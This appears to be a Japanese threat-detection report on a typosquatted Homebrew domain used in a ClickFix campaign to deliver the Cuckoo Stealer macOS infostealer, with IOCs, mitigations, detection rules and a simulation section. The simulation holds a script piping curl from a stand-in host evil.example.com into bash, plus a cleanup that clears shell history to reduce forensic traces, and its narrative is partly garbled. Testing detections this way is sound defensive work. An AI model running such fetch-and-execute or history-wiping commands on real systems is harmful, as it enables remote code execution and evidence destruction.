偽のHomebrewタイポスクワット、Cuckoo StealerをClickFix経由で配信
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
このレポートは、タイポスクワットされたHomebrewドメインを悪用し、macOS開発者を「インストール」コマンドの実行へ誘導するキャンペーンを記述しています。クリックフィックス手法を使用し、クラフトされたcurlワンライナーが被害者を攻撃者が制御するインフラに送信し、資格情報を収集するローダーと続いてCuckoo Stealerインフォスティーラーを配信します。マルウェアはLaunchAgentを通じて永続性を持ち、隔離属性を削除し、HTTPSを介して資格情報やウォレットデータを流出させます。検出はcurlコマンドパターンと関連するインフラストラクチャに焦点を当てるべきです。
調査
研究者たちは初期の誘惑をhomabrews.orgにたどり、オランダの5.255.123.244に解析され、複数の類似ドメイン(配信に使用されるraw.homabrews.orgを含む)をホストしていることを発見しました。ダウンロードされたスクリプトはdscl authonlyループを実行してmacOS資格情報を検証し、次にbrew_agentという名前のバイナリを取得します。第二段階では、Cuckoo StealerがLaunchAgentのplistを生成し、隔離フラグを削除し、X25519鍵交換とXOR暗号化されたペイロードを使ってC2と通信します。インフラストラクチャのハンティングでは、同じホスティングIPを共有する少なくとも6つのドメインのネットワークが明らかにされました。
緩和策
開発者にHomebrewインストールURLを確認し、信頼できないコマンドをターミナルにコピー・ペーストしないよう教育しましょう。コマンドラインログを有効にし、特に「curl | sh」スタイルのワンライナーでリモートスクリプトを即座に実行するパターンを制限します。エンドポイントの保護は疑わしいLaunchAgentの作成や隔離属性の削除を警告するべきです。ネットワーク防御は既知の悪意のあるドメインをブロックし、raw.homabrews.orgや関連するホストへのトラフィックにフラグを立てるべきです。
対応策
疑わしいcurlコマンドが検出された場合、エンドポイントを隔離し、スクリプトとbrew_agentバイナリをキャプチャし、解析のためにLaunchAgent plistを収集します。ブラウザ、キーチェーン、暗号通貨ウォレットのために、収集された資格情報をリセットし、侵害されたトークンを取り消します。隠しBrewUpdaterディレクトリ、作成されたショートカットを法医学的にレビューし、悪意のあるファイルを削除します。抽出したIOCで検出を更新し、同じインフラの再利用を監視します。
攻撃フロー
検出
疑わしいキーチェーン活動(プロセス作成経由)
表示
MacOS 疑わしい/tmpフォルダのファイル権限の変更(コマンドライン経由)
表示
疑わしい MacOS – Plist の場所と名前(ファイルイベント経由)
表示
MacOS 保存されたブラウザ資格の疑わしいアクセス(プロセス作成経由)
表示
MacOS システムボリュームが osascript を使用してミュートされた(コマンドライン経由)
表示
MacOS Screencapture 実行試行による可能性のあるコレクション(コマンドライン経由)
表示
MacOS での疑わしいCurl実行試行(コマンドライン経由)
表示
IOC(HashSha256)を検出する: 偽のHomebrewタイポスクワットがClickFix経由でCuckoo Stealerを配信するために使用される
表示
IOC(SourceIP)を検出する: 偽のHomebrewタイポスクワットがClickFix経由でCuckoo Stealerを配信するために使用される
表示
IOC(DestinationIP)を検出する: 偽のHomebrewタイポスクワットがClickFix経由でCuckoo Stealerを配信するために使用される
表示
ClickFix による悪意のあるmacOS インストールコマンドの検出 [Linux プロセス作成]
表示
ClickFixキャンペーンにおけるタイポスクワッティングドメインと悪意のあるIPの検出 [ネットワーク指標]
表示
シミュレーションの実行
前提条件: テレメトリーとベースラインの事前フライトチェックが合格している必要があります。
根拠: このセクションでは、攻撃者の技術手法(TTP)を正確に実行し、検出ルールをトリガーすることを目的としています。コマンドと説明は、特定されたTTPに直接反映され、検出ロジックで予想される正確なテレメトリを生成することを目的としています。抽象的または無関係な例は誤診につながります。
-
攻撃に関する物語とコマンド:
攻撃者はC2サーバーにホストされている悪意のあるPowerShell-エンコードされたスクリプトを取得しました。ディスクにファイルを記述することを避けるため、攻撃者はスクリプトを直接Bashシェルにストリーミングしますcurl -fsSLと-cフラグ。コマンドは妥協されたユーザーアカウントから対話形式で実行され、正当な「クリック修正」インストーラーを模倣します。手順は以下の通りです:- 悪意のあるペイロードURLを解決します(例、
https://evil.example.com/payload.sh). - Bashにダウンロードをパイプし、
-c. - と共にコンテンツを実行するように指示します T1070.004).
- 悪意のあるペイロードURLを解決します(例、
-
回帰テストスクリプト:
#!/usr/bin/env bash # ------------------------------------------------- # 悪意のあるmacOSインストーラーをシミュレート(ClickFixスタイル) # ------------------------------------------------- set -euo pipefail MALICIOUS_URL="https://evil.example.com/payload.sh" # -cを使用してペイロードを直接Bashにストリーミングします curl -fsSL "$MALICIOUS_URL" | /bin/bash -c "$(cat)" # ペイロード自体が悪意のある行動を実行することを仮定しています。 # テストの目的では、単にマーカーをエコーします。 echo "悪意のあるペイロードが実行されました" -
クリーンアップコマンド:
# ペイロードによって作成された可能性のあるファイルを削除します rm -f /tmp/payload.sh # オプションで、法医学的な痕跡を減らすためにコマンド履歴をクリアします history -c